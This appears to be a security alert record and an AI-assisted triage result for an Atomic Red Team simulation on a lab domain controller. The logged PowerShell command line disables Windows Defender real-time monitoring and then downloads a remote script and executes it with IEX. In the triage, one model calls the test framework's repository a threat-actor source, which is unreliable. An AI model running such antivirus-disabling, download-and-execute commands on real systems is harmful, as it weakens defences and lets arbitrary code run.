{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Tampering",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1567.003 -CheckPrereqs ; Invoke-AtomicTest T1567.003 -GetPrereqs ; Invoke-AtomicTest T1567.003 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 143122432,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld368E.tmp.bat T1567.003 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4661248,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 7640,
        "THIS_ATOM": "45e4e3418a6f8c858f274b1569c2a828",
        "THREADS": 3,
        "TIMESTAMP": 1774364711483,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 7640,
      "PROCESS_ID": 3268,
      "THREADS": 33,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "db1e086f-3311-40f1-a0bf-1eded3473d79",
      "event_time": 1774364713278,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3047,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "45e4e3418a6f8c858f274b1569c2a828",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "59a8d473d7fb33057005984369c2a82b"
    }
  },
  "detect_id": "71d3ccbd-820e-4297-b617-0f6369c2a82c",
  "gen_time": 1774364716327,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364713\u0026selected=59a8d473d7fb33057005984369c2a82b",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "db1e086f-3311-40f1-a0bf-1eded3473d79",
    "event_time": 1774364713278,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3047,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "45e4e3418a6f8c858f274b1569c2a828",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "59a8d473d7fb33057005984369c2a82b"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364716000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.95,
  "false_positive_reason": null,
  "investigation_questions": [
    "Was there an authorized security assessment or Red Team exercise scheduled for this Domain Controller?",
    "Why was the testing framework executed with SYSTEM privileges?",
    "Are there other hosts showing similar Atomic Red Team activity in the same timeframe?"
  ],
  "ioc_analysis": "The primary IOC is the PowerShell command \u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027, which is a high-fidelity indicator of security control tampering. The inclusion of \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 confirms the activity is related to the Atomic Red Team testing framework.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1",
    "Set-MpPreference -DisableRealtimeMonitoring $true"
  ],
  "mitre_techniques": [
    "T1562.001",
    "T1059.001",
    "T1567.003",
    "T1056.001",
    "T1115"
  ],
  "recommended_actions": [
    "ESCALATE to Incident Response (unanimous AI verdict)",
    "Isolate affected sensor immediately",
    "Confirm with the Red Team or System Administration team if authorized testing was scheduled for df-labsdc01.dflabs.local.",
    "Verify that real-time monitoring has been re-enabled on the host after completion of the tests.",
    "Whitelist or tag this specific testing activity if it is part of regular security posture validation to reduce alert volume."
  ],
  "risk_score": 75,
  "severity": "medium",
  "summary": "**Vote: UNANIMOUS (3/3 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** true_positive | **Confidence:** 1.0\nThe detection triggered due to the explicit disabling of Windows Defender Real-time Monitoring via PowerShell. Investigation reveals this is part of an automated security simulation using the Atomic Red Team framework (Invoke-AtomicTest), as evidenced by the command line and subsequent execution of multiple MITRE ATT\u0026CK techniques (T1567.003, T1056.001, T1115).\n\n**IOC Analysis:** The primary IOC is the PowerShell command \u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027, which is a high-fidelity indicator of security control tampering. The inclusion of \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 confirms the activity is related to the Atomic Red Team testing framework.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious activity where an attacker is disabling real-time monitoring and deploying the Atomic Red Team framework via PowerShell under SYSTEM privileges. The command line explicitly disables Microsoft Defender\u0027s real-time protection and downloads executable code from a known threat actor repository.\n\n**IOC Analysis:** The process path (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) is legitimate, but the command line contains malicious indicators: disabling real-time monitoring (Set-MpPreference), downloading and executing remote scripts (IEX with raw.githubusercontent.com), and deploying offensive tools (Install-AtomicRedTeam). The use of SYSTEM privileges combined with disabling security controls confirms this is not a false positive.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.9\nA PowerShell process running from the legitimate System32 directory executes a malicious command line that disables real-time monitoring and installs attack tools, indicating a high-risk event related to bypassing security measures.\n\n**IOC Analysis:** The FILE_PATH is a legitimate Windows PowerShell executable in the expected directory, but the command line includes suspicious actions such as disabling real-time monitoring and downloading/installing Atomic Red Team modules, which are often associated with adversary actions. The hash matches a Microsoft-signed PowerShell binary, but the context suggests malicious intent. The parent process is legitimate cmd.exe, but it\u0027s invoked from a temporary batch file, raising suspicion.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "escalate_ir",
    "mode": "unanimous",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: true_positive (medium, 100% confidence)",
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: true_positive (high, 90% confidence)"
    ],
    "votes": [
      {
        "confidence": 1.0,
        "model": "gemini-cli",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.9,
        "model": "deepseek-r1:8b",
        "verdict": "true_positive"
      }
    ],
    "winning_count": 3,
    "winning_verdict": "true_positive"
  }
}